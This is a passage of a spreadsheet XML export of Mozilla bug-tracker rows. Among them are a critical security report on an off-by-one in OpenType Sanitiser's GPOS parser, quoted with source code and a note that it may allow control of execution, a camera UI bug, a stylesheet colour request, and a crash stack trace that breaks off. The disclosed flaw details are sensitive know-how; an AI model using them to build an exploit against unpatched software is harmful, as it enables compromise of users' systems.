      <c r="I5516" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5516" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5516" t="inlineStr">
        <is>
          <t>11 Branch</t>
        </is>
      </c>
      <c r="L5516" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5516" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5516" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5516" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5516" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q5516" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5516" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5516" t="inlineStr">
        <is>
          <t>Firefox 12</t>
        </is>
      </c>
      <c r="T5516" t="n">
        <v>1</v>
      </c>
      <c r="U5516" t="n">
        <v>0</v>
      </c>
      <c r="V5516" t="n">
        <v>18</v>
      </c>
      <c r="W5516" t="inlineStr">
        <is>
          <t>This is chromium bug:
https://code.google.com/p/chromium/issues/detail?id=116524
which states that  jruderman and dveditz are cced, but since i did not find an open bug, i decided to open one. (Apologies if this is a dupe.)
Patch available at:
http://code.google.com/p/ots/source/detail?r=83#
snippet from upstream bug:
There's an off-by-one vulnerability in OpenType Sanitiser (http://code.google.com/p/ots/). The bug was found using AddressSanitizer.
See the following code from src/gpos.cc:
--- cut ---
30:   GPOS_TYPE_RESERVED = 10
[...]
60: const ots::LookupSubtableParser::TypeParser kGposTypeParsers[] = {
61:   {GPOS_TYPE_SINGLE_ADJUSTMENT, ParseSingleAdjustment},
62:   {GPOS_TYPE_PAIR_ADJUSTMENT, ParsePairAdjustment},
63:   {GPOS_TYPE_CURSIVE_ATTACHMENT, ParseCursiveAttachment},
64:   {GPOS_TYPE_MARK_TO_BASE_ATTACHMENT, ParseMarkToBaseAttachment},
65:   {GPOS_TYPE_MARK_TO_LIGATURE_ATTACHMENT, ParseMarkToLigatureAttachment},
66:   {GPOS_TYPE_MARK_TO_MARK_ATTACHMENT, ParseMarkToMarkAttachment},
67:   {GPOS_TYPE_CONTEXT_POSITIONING, ParseContextPositioning},
68:   {GPOS_TYPE_CHAINED_CONTEXT_POSITIONING, ParseChainedContextPositioning},
69:   {GPOS_TYPE_EXTENSION_POSITIONING, ParseExtensionPositioning}
70: };
71: 
72: const ots::LookupSubtableParser kGposLookupSubtableParser = {
73:   GPOS_TYPE_RESERVED, GPOS_TYPE_EXTENSION_POSITIONING, kGposTypeParsers
74: };
--- cut ---
The kGposTypeParsers table has 9 items, however a value of 10 (GPOS_TYPE_RESERVED) is used as the num_types value of the kGposLookupSubtableParser structure. This can later lead to an out-of-bounds read and execution of an uninitialized function pointer from kGposTypeParsers[9].parser (see src/layout.cc):
1153: bool LookupSubtableParser::Parse(const OpenTypeFile *file, const uint8_t *data,
1154:                                  const size_t length,
1155:                                  const uint16_t lookup_type) const {
1156:   for (unsigned i = 0; i &lt; num_types; ++i) {
1157:     if (parsers[i].type == lookup_type &amp;&amp; parsers[i].parse) {
1158:       if (!parsers[i].parse(file, data, length)) {
1159:         return OTS_FAILURE();
1160:       }
1161:       return true;
1162:     }
1163:   }
1164:   return OTS_FAILURE();
1165: }
The vulnerable behavior can be potentially used to get a direct control over the application's execution flow.</t>
        </is>
      </c>
      <c r="X5516" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5517">
      <c r="A5517" t="n">
        <v>921821</v>
      </c>
      <c r="B5517" t="inlineStr">
        <is>
          <t>2013-09-29 02:52:05 -0700</t>
        </is>
      </c>
      <c r="C5517" t="inlineStr">
        <is>
          <t>[Buri][Camera]The picture size larger than normally size when you rotate the phone to landscape mode</t>
        </is>
      </c>
      <c r="D5517" t="inlineStr">
        <is>
          <t>2013-10-18 03:03:20 -0700</t>
        </is>
      </c>
      <c r="E5517" t="n">
        <v>1</v>
      </c>
      <c r="F5517" t="n">
        <v>1</v>
      </c>
      <c r="G5517" t="n">
        <v>6</v>
      </c>
      <c r="H5517" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5517" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5517" t="inlineStr">
        <is>
          <t>Gaia::Camera</t>
        </is>
      </c>
      <c r="K5517" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5517" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5517" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5517" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5517" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5517" t="inlineStr"/>
      <c r="Q5517" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5517" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5517" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5517" t="n">
        <v>1</v>
      </c>
      <c r="U5517" t="n">
        <v>0</v>
      </c>
      <c r="V5517" t="n">
        <v>12</v>
      </c>
      <c r="W5517" t="inlineStr">
        <is>
          <t>Firefox os  v1.1
  Mozilla build ID:20130916041201
 Created an attachment (id=527276)
 picture
 DEFECT DESCRIPTION:
 The picture size larger than normally size when you rotate the phone to landscape mode
 REPRODUCING PROCEDURES:
 1.Enter Camera app and take a picture
 2.Tap the picture to view
 3.Rotate the phone to landscape mode and double tap on photo
 4.Rotate the phone to Portrait mode and double tap on photo
 5.Rotate the phone to landscape mode--&gt;The picture size larger than normally size--&gt;ko 
  Note: this issue is similar with PR525546
 EXPECTED BEHAVIOUR:
 ko:the picture size shows normally
 ASSOCIATE SPECIFICATION:
 TEST PLAN REFERENCE:
 TOOLS AND PLATFORMS USED:
 USER IMPACT:
 Mid
 REPRODUCING RATE:
 5/5
 For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X5517" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5518">
      <c r="A5518" t="n">
        <v>694093</v>
      </c>
      <c r="B5518" t="inlineStr">
        <is>
          <t>2011-10-12 11:49:30 -0700</t>
        </is>
      </c>
      <c r="C5518" t="inlineStr">
        <is>
          <t>make hover color of masthead link #043B84</t>
        </is>
      </c>
      <c r="D5518" t="inlineStr">
        <is>
          <t>2011-10-21 15:59:26 -0700</t>
        </is>
      </c>
      <c r="E5518" t="n">
        <v>1</v>
      </c>
      <c r="F5518" t="n">
        <v>1</v>
      </c>
      <c r="G5518" t="n">
        <v>5</v>
      </c>
      <c r="H5518" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5518" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5518" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5518" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5518" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5518" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5518" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5518" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5518" t="inlineStr"/>
      <c r="Q5518" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5518" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5518" t="inlineStr">
        <is>
          <t>2011-10-25</t>
        </is>
      </c>
      <c r="T5518" t="n">
        <v>1</v>
      </c>
      <c r="U5518" t="n">
        <v>0</v>
      </c>
      <c r="V5518" t="n">
        <v>4</v>
      </c>
      <c r="W5518" t="inlineStr">
        <is>
          <t>Should match the style of AMO's masthead, which hovers to a nice navy blue.
http://cl.ly/0s301C0k1X0I1W2V0n1G</t>
        </is>
      </c>
      <c r="X5518" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5519">
      <c r="A5519" t="n">
        <v>1735852</v>
      </c>
      <c r="B5519" t="inlineStr">
        <is>
          <t>2021-10-14 10:41:37 -0700</t>
        </is>
      </c>
      <c r="C5519" t="inlineStr">
        <is>
          <t>Intermittent [tier2] dom/html/test/test_fullscreen-api-race.html | application crashed [@ nsCocoaWindow::DoMakeFullScreen(bool, bool)]</t>
        </is>
      </c>
      <c r="D5519" t="inlineStr">
        <is>
          <t>2022-08-26 23:22:32 -0700</t>
        </is>
      </c>
      <c r="E5519" t="n">
        <v>1</v>
      </c>
      <c r="F5519" t="n">
        <v>1</v>
      </c>
      <c r="G5519" t="n">
        <v>3</v>
      </c>
      <c r="H5519" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5519" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5519" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5519" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5519" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5519" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5519" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5519" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5519" t="inlineStr">
        <is>
          <t>[adv-main95+r]</t>
        </is>
      </c>
      <c r="Q5519" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5519" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S5519" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5519" t="n">
        <v>1</v>
      </c>
      <c r="U5519" t="n">
        <v>0</v>
      </c>
      <c r="V5519" t="n">
        <v>8</v>
      </c>
      <c r="W5519" t="inlineStr">
        <is>
          <t>**Filed by:** abutkovits [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer?job_id=354790877&amp;repo=autoland
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/c-QOWpJGSve-mABLJfp9rw/runs/0/artifacts/public/logs/live_backing.log
---
```
[task 2021-10-14T16:01:32.132Z] 16:01:32     INFO - mozcrash Downloading symbols from: https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/aOTiTtrfTxqINuQO_UGaYw/artifacts/public/build/target.crashreporter-symbols.zip
[task 2021-10-14T16:01:36.540Z] 16:01:36     INFO - mozcrash Copy/paste: /opt/worker/tasks/task_163422606348914/fetches/minidump_stackwalk/minidump_stackwalk /var/folders/db/3zrknqk954d_sn2t59z8ydsh000014/T/tmpqbxfdjr1.mozrunner/minidumps/9A84A0AB-EB47-447A-ABF4-356050F5767C.dmp /var/folders/db/3zrknqk954d_sn2t59z8ydsh000014/T/tmp0647css6
[task 2021-10-14T16:01:42.137Z] 16:01:42     INFO - mozcrash Saved minidump as /opt/worker/tasks/task_163422606348914/build/blobber_upload_dir/9A84A0AB-EB47-447A-ABF4-356050F5767C.dmp
[task 2021-10-14T16:01:42.137Z] 16:01:42     INFO - mozcrash Saved app info as /opt/worker/tasks/task_163422606348914/build/blobber_upload_dir/9A84A0AB-EB47-447A-ABF4-356050F5767C.extra
[task 2021-10-14T16:01:42.516Z] 16:01:42     INFO - PROCESS-CRASH | dom/html/test/test_fullscreen-api-race.html | application crashed [@ nsCocoaWindow::DoMakeFullScreen(bool, bool)]
[task 2021-10-14T16:01:42.516Z] 16:01:42     INFO - Crash dump filename: /var/folders/db/3zrknqk954d_sn2t59z8ydsh000014/T/tmpqbxfdjr1.mozrunner/minidumps/9A84A0AB-EB47-447A-ABF4-356050F5767C.dmp
[task 2021-10-14T16:01:42.516Z] 16:01:42     INFO - Operating system: Mac OS X
[task 2021-10-14T16:01:42.516Z] 16:01:42     INFO -                   10.15.7 19H524
[task 2021-10-14T16:01:42.516Z] 16:01:42     INFO - CPU: amd64
[task 2021-10-14T16:01:42.516Z] 16:01:42     INFO -      family 6 model 158 stepping 10
[task 2021-10-14T16:01:42.516Z] 16:01:42     INFO -      12 CPUs
[task 2021-10-14T16:01:42.516Z] 16:01:42     INFO - 
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO - GPU: UNKNOWN
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO - 
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO - Crash reason:  EXC_BAD_ACCESS / EXC_I386_GPFLT
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO - Crash address: 0x0
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO - Process uptime: 87 seconds
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO - 
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO - Thread 0 tid 775 (crashed) - GeckoMain 0  XUL!mozilla::layers::NativeLayerRootCA::SetWindowIsFullscreen(bool) [NativeLayerCA.mm:68f5bca6b432346740523a54babd677e6a08ae1a : 479 + 0x1c]
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     rax = 0x000000012b8dddd0   rdx = 0x0000000117fcbca8
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     rcx = 0x0000000000000001   rbx = 0xe5e5e5e5e5e5e5e5
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     rsi = 0x00000000e5e5e5e5   rdi = 0x0000000120cb5520
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     rbp = 0x00007ffee8561be0   rsp = 0x00007ffee8561bc0
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -      r8 = 0x0000000000000002    r9 = 0x0000000100000000
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     r10 = 0x0000000117fcbca8   r11 = 0x00000001145b8810
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     r12 = 0x0000000000000007   r13 = 0x000000010c30b600
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     r14 = 0x000000012a85fee0   r15 = 0x0000000000000004
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     rip = 0x0000000112fa22e3
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     Found by: given as instruction pointer in context
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -  1  XUL!nsCocoaWindow::DoMakeFullScreen(bool, bool) [nsCocoaWindow.mm:68f5bca6b432346740523a54babd677e6a08ae1a : 1675 + 0x17]
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     rbx = 0x0000000000000000   rbp = 0x00007ffee8561c10
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     rsp = 0x00007ffee8561bf0   r12 = 0x0000000000000000
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     r13 = 0x000000010c30b600   r14 = 0x0000000000000000
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     r15 = 0x000000010c30b600   rip = 0x00000001145ed81b
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -  2  XUL!nsGlobalWindowOuter::SetWidgetFullscreen(FullscreenReason, bool, nsIWidget*, nsIScreen*) [nsGlobalWindowOuter.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 4654 + 0x6]
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     rbx = 0x0000000107949bc0   rbp = 0x00007ffee8561c60
[task 2021-10-14T16:01:42.517Z] 16:01:42     INFO -     rsp = 0x00007ffee8561c20   r12 = 0x0000000000000002
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r13 = 0x000000010c30b600   r14 = 0x0000000000000000
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r15 = 0x0000000000000000   rip = 0x00000001130d2e6c
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -  3  XUL!MakeWidgetFullscreen(nsGlobalWindowOuter*, FullscreenReason, bool) [nsGlobalWindowOuter.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 4509 + 0x15]
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     rbx = 0x0000000107949bc0   rbp = 0x00007ffee8561d10
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     rsp = 0x00007ffee8561c70   r12 = 0x0000000000000002
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r13 = 0x0000000107949be0   r14 = 0x000000010c30b600
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r15 = 0x0000000000000000   rip = 0x00000001130d35ee
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -  4  XUL!nsGlobalWindowOuter::SetFullscreenInternal(FullscreenReason, bool) [nsGlobalWindowOuter.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 4601 + 0xd]
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     rbx = 0x0000000000000000   rbp = 0x00007ffee8561d80
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     rsp = 0x00007ffee8561d20   r12 = 0x0000000000000000
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r13 = 0x0000000107949be0   r14 = 0x0000000107949bc0
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r15 = 0x0000000000000002   rip = 0x00000001130d289a
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -  5  XUL!mozilla::dom::ExitFullscreenScriptRunnable::Run() [Document.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 14134 + 0x10]
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     rbx = 0x00000001618deb50   rbp = 0x00007ffee8561db0
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     rsp = 0x00007ffee8561d90   r12 = 0x00007ffee8561e68
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r13 = 0x00007ffee8561e78   r14 = 0x00000001618deb50
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r15 = 0x00000001618deb50   rip = 0x0000000113149cd7
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -  6  XUL!nsContentUtils::AddScriptRunner(already_AddRefed&lt;nsIRunnable&gt;) [nsContentUtils.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 5757 + 0x9]
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     rbx = 0x0000000121414000   rbp = 0x00007ffee8561e40
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     rsp = 0x00007ffee8561dc0   r12 = 0x00007ffee8561e68
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r13 = 0x00007ffee8561e78   r14 = 0x00000001618deb50
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     r15 = 0x00000001618deb50   rip = 0x0000000110f15e9b
[task 2021-10-14T16:01:42.518Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -  7  XUL!mozilla::dom::Document::ExitFullscreenInDocTree(mozilla::dom::Document*) [Document.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 14188 + 0x8]
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     rbx = 0x0000000121414000   rbp = 0x00007ffee8561eb0
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     rsp = 0x00007ffee8561e50   r12 = 0x00007ffee8561e68
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     r13 = 0x00007ffee8561e78   r14 = 0x0000000121414000
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     r15 = 0x00000001618deb50   rip = 0x0000000113127659
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -  8  XUL!mozilla::dom::Document::OnPageHide(bool, mozilla::dom::EventTarget*, bool) [Document.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 11731 + 0x8]
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     rbx = 0x0000000000000000   rbp = 0x00007ffee8561f30
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     rsp = 0x00007ffee8561ec0   r12 = 0x00007ffee8561ee0
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     r13 = 0x0000000121414000   r14 = 0x0000000001040200
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     r15 = 0x00007ffee8561ef0   rip = 0x0000000110f96cb9
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -  9  XUL!nsDocumentViewer::PageHide(bool) [nsDocumentViewer.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 1389 + 0x15]
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     rbx = 0x000022d7708992e0   rbp = 0x00007ffee8562020
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     rsp = 0x00007ffee8561f40   r12 = 0x0000000000000000
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     r13 = 0x0000000000000001   r14 = 0x0000000000000001
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     r15 = 0x000000010ea2e640   rip = 0x0000000111556671
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO - 10  XUL!nsDocShell::FirePageHideNotificationInternal(bool, bool) [nsDocShell.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 1119 + 0x10]
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     rbx = 0x0000000000000000   rbp = 0x00007ffee85620e0
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     rsp = 0x00007ffee8562030   r12 = 0x0000000000000001
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     r13 = 0x0000000000000001   r14 = 0x000000010ea2e640
[task 2021-10-14T16:01:42.519Z] 16:01:42     INFO -     r15 = 0x000000012ae7f800   rip = 0x00000001117e5d00
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO - 11  XUL!nsDocShell::Destroy() [nsDocShell.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 4409 + 0xf]
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     rbx = 0x0000000123946c00   rbp = 0x00007ffee8562130
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     rsp = 0x00007ffee85620f0   r12 = 0x00007ffee85620f8
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     r13 = 0x000000012ae7f800   r14 = 0x000000010b2c9b40
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     r15 = 0x000000012ae7f990   rip = 0x00000001117e1cc0
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO - 12  XUL!mozilla::AppWindow::Destroy() [AppWindow.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 632 + 0xa]
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     rbx = 0x0000000123946c00   rbp = 0x00007ffee8562190
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     rsp = 0x00007ffee8562140   r12 = 0x000000010e129700
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     r13 = 0x0000000000000003   r14 = 0x000000010e129710
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     r15 = 0x0000000121799470   rip = 0x0000000111804390
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO - 13  XUL!{virtual override thunk({offset(-8)}, nsChromeTreeOwner::Destroy())} + 0x12
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     rbx = 0x000000010b27f308   rbp = 0x00007ffee85621a0
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     rsp = 0x00007ffee85621a0   r12 = 0x00000001209cdc00
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     r13 = 0x0000000000000003   r14 = 0x0000000107949bc0
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     r15 = 0x000000011800da50   rip = 0x0000000115160212
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO - 14  XUL!nsGlobalWindowOuter::ReallyCloseWindow() [nsGlobalWindowOuter.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 6356 + 0x9]
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     rbx = 0x000000010b27f308   rbp = 0x00007ffee85621c0
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     rsp = 0x00007ffee85621b0   r12 = 0x00000001209cdc00
[task 2021-10-14T16:01:42.520Z] 16:01:42     INFO -     r13 = 0x0000000000000003   r14 = 0x0000000107949bc0
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     r15 = 0x000000011800da50   rip = 0x00000001130d88eb
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO - 15  XUL!nsCloseEvent::Run() [nsGlobalWindowOuter.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 6157 + 0x5]
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     rbx = 0x000000000000000c   rbp = 0x00007ffee85621d0
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     rsp = 0x00007ffee85621d0   r12 = 0x00000001209cdc00
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     r13 = 0x0000000000000003   r14 = 0x000000012a044040
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     r15 = 0x000000011800da50   rip = 0x00000001130da78b
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO - 16  XUL!mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) [TaskController.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 770 + 0x263]
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     rbx = 0x000000000000000c   rbp = 0x00007ffee85627f0
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     rsp = 0x00007ffee85621e0   r12 = 0x00000001209cdc00
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     r13 = 0x0000000000000003   r14 = 0x000000012a044040
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     r15 = 0x000000011800da50   rip = 0x000000011087cb76
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO - 17  XUL!nsThread::ProcessNextEvent(bool, bool*) [nsThread.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 1151 + 0x3f]
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     rbx = 0x00007ffee85629f0   rbp = 0x00007ffee8562a70
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     rsp = 0x00007ffee8562800   r12 = 0x0000000107955900
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     r13 = 0x000000010b259040   r14 = 0x000000010b27adf0
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     r15 = 0x000000010b259040   rip = 0x000000011088bfb8
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.521Z] 16:01:42     INFO - 18  XUL!NS_ProcessPendingEvents(nsIThread*, unsigned int) [nsThreadUtils.cpp:68f5bca6b432346740523a54babd677e6a08ae1a : 432 + 0x1e]
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     rbx = 0x0000000000000000   rbp = 0x00007ffee8562ac0
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     rsp = 0x00007ffee8562a80   r12 = 0x00007ffee8562a8f
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     r13 = 0x000000010b259040   r14 = 0x000000011088b8f0
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     r15 = 0x00000000001302ed   rip = 0x000000011088939b
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     Found by: call frame info
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO - 19  XUL!nsAppShell::ProcessGeckoEvents(void*) [nsAppShell.mm:68f5bca6b432346740523a54babd677e6a08ae1a : 500 + 0x50]
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     rbx = 0x0000000000000000   rbp = 0x00007ffee8562b20
[task 2021-10-14T16:01:42.522Z] 16:01:42     INFO -     rsp = 0x00007ffee8562ad0   r12 = 0x0000000000000001
